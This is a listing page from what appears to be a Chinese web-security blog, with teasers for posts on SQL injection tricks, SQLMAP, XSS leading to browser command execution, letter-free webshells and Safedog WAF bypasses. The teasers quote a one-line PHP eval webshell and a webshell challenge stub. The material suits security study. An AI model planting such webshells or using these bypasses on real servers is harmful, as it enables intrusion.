最新消息:

WEB安全

MySQL False注入及技巧总结

MySQL False注入及技巧总结

Eternal 3周前 (05-05) 486浏览 0评论

0x01 False Injection 引子 首先我们常见的注入 1=1 0<1 ''='' 这些都是基于1=1这样的值得比较的普通注入,下面来说说关于False注入,利用False我们可以绕过一些特定的WAF以及一些未来不确定的因素,...

SQL注入防御与绕过的几种姿势

SQL注入防御与绕过的几种姿势

Eternal 4周前 (05-04) 619浏览 0评论

前言 本文章主要以后端PHP和MySQL数据库为例,参考了多篇文章后的集合性文章,欢迎大家提出个人见解,互促成长。 一、 PHP几种防御姿势 1、关闭错误提示 说明: PHP配置文件php.ini中的display_errors=Off,这样就...

Chrome浏览器上显示绿色标识,你就安全了吗?

Chrome浏览器上显示绿色标识,你就安全了吗?

Eternal 2个月前 (04-02) 634浏览 0评论

据相关数据显示,在网络上有超过50%的用户使用的浏览器为Chrome浏览器。而长期使用Chrome浏览器的用户其实都不难发现,每当你访问使用SSL(也称为HTTPS或TLS)的网站时,在URL地址栏的HTTPS旁就会显示醒目的绿色“安全标识”。那么C...

SQLMAP详解+实战操作命令

SQLMAP详解+实战操作命令

Mat 2个月前 (03-24) 1032浏览 0评论

SQLMAP是一款基于python开发的SQL注入工具,几乎支持现在所有的数据库,功能非常强大。由于是国外的产品,所以对于我这种英语水平不高的菜鸟来说,使用起来会有点困难。虽然现在已经能熟练使用大部分功能了,但还是把中文解释贴过来,方便以后使用。 O...

我是如何从一个xss到某某浏览器的远程命令执行

我是如何从一个xss到某某浏览器的远程命令执行

Mat 2个月前 (03-22) 95240浏览 0评论

0x01 前言:其实我是个小白平时就喜欢瞎搞,无意间碰到一个浏览器就想一探究竟,好了废话不多说开始!!! 0x02 可以看到我打开的新标签是怎么一个链接页面,既然是页面我是不可以XSS它呢? 于是我就打开了控制器输入XSS代码如下图: 输入pay...

浅谈HTTP协议

浅谈HTTP协议

Mat 2个月前 (03-20) 703浏览 1评论

一、HTTP协议详解之URL篇 http(超文本传输协议)是一个基于请求与响应模式的、无状态的、应用层的协议,常基于TCP的连接方式,HTTP1.1版本中给出一种持续连接的机制,绝大多数的Web开发,都是构建在HTTP协议之上的Web应用。 HTT...

一些不包含数字和字母的webshell

一些不包含数字和字母的webshell

Eternal 3个月前 (02-18) 718浏览 0评论

在小密圈提了个问题,“如何编写一个不使用数字和字母的webshell”,并具体成如下代码: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell...

三个混淆过狗一句话分析

三个混淆过狗一句话分析

Eternal 3个月前 (02-17) 888浏览 0评论

1.一句话的工作原理 首先我们看一下就常见的一句话。 <?php @eval($_POST[‘pass’])?> 单从php语法上理解,首先$_POST会获取post到服务器的参数名为pass的数据,然后eval会将$_POST获取的字...

安全狗的一些绕过姿势

安全狗的一些绕过姿势

Mat 3个月前 (02-13) 1015浏览 0评论

前言 安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量。最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入、文件上传、防webshell等都可以被绕过,下面为大家一一介绍。 一、测试环境 本次测试环境为: 中文版 Win2...

合作伙伴